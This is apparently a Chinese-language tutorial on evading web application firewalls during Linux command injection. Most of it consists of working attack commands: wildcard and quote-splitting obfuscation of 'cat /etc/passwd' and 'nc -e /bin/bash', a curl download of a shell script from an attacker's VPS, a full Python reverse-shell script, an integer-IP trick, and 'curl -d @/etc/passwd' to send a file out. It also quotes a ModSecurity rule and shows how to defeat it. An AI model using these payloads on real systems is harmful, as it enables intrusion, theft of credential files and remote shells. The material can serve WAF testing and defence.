Linux环境下命令注入————WAF绕过技巧

命令注入之Web应用防火墙绕过技巧

本文中讲述的绕过防火墙技巧，只适用于linux系统命令注入环境中，大家就不要纠结于这些绕过技巧不适用于mysql、window什么的。

---

使用通配符绕过防火墙规则

例如使用 /???/c?t /?t?/p??swd 来代替 cat /etc/passwd

/???/c?t /?t?/p??swd 其实匹配到的是 /bash/cat /etc/passwd

有时候我们想用netcat在目标机器上反弹一个端口，那么可以如下操作：

/???/n? -e /???/b??h 127.0.0.1 6666
# /bin/nc -e /bin/bash 127.0.0.1 6666
# -e 后面跟上你要执行的程序，在连接成功后会自动运行该程序

当然，你还可以使用*星号、[0-9]字符集等匹配符来获取相关信息，有关标准通配符的更多信息可以在终端中键入 命令man 7 glob，按照手册进行学习。

使用字符串拼接绕过防火墙规则

连接字符串的操作符主要有以下几种

在python、Java中使用 + 号；在PHP、perl中使用 . 号；在lua语言中则使用 .. 符号来连接字符串。而这些编程语言中的一些字符串连接符，有时候在bash中也可以达到字符连接的效果，这就导致我们可以绕过一些Web应用防火墙规则(例如基于关键词匹配的防火墙规则)。

root@kali:~# echo Mochazz
Mochazz
root@kali:~# echo Mo'''chazz'
Mochazz
root@kali:~# echo 'Mo''chazz'
Mochazz
root@kali:~# echo 'M'och'az'z
Mochazz

看一条pm匹配规则（防火墙规则）

# Detect suspicious client by looking at the user agent identification 
SecRule REQUEST_HEADERS:User-Agent "@pm passwd shadow" "id:166"

这条规则将忽略大小写进行匹配，如果匹配中passwd或shadow词组，即进行阻断，但是如果我们使用字符串拼接，则可以绕过改规则

root@kali:~# /'b'i''n/'c''a't /e't'c/p''as''sw'd'

使用以下命令在受害机上下载用于反弹shell的脚本

curl -v "http://VPS的IP/shell.py" -o /tmp/shell.py

shell.py 代码如下

#!/usr/bin/python
import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("",2375))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/sh","-i"])

提前在你的VPS上用nc侦听一个端口

nc -lvp [port]

更进一步，我们可以将点分十进制的IP转换成长整数IP，例如

curl -v "http://127.0.0.1/shell.py" -o /tmp/shell.py
curl -v "http://2130706433/shell.py" -o /tmp/shell.py

使用 \ 符号来绕过WAF

root@kali:~# c\a\t /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin

使用 \ 符号加回车来绕过WAF

root@kali:~# c\
> at /e't'c/p''a's'swd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync

使用curl -d参数读取本地文件

curl -d @/ 
例如
curl -d @/etc/passwd 127.0.0.1:8888
# 在本地侦听8888端口即可接受到数据

关于文中更详细的内容，大家可以参考下面两篇文章。
PS：刚好这两天在看这两篇文章，freebuf小编在昨天翻译了其中一篇，大家也可以看WAF绕过技巧浅谈

Web Application Firewall (WAF) Evasion Techniques

Web Application Firewall (WAF) Evasion Techniques #2